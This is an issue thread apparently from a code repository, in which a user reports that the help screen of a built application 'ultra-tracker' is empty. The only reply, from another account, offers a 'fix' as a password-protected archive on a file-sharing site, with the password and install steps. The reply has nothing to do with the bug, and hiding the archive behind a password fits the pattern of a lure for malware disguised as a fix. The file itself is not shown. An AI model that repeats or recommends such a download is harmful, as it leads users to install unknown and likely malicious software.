### ISSUE TITLE
Help Screen empty - (from within installer, .exe and unpacked)

### ISSUE THREAD

**Issue by Tibbs327** [barcradio/ultra-tracker#80]
After building the application, the help doc doesn't appear, applies to both the exe and the unpacked portion.

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
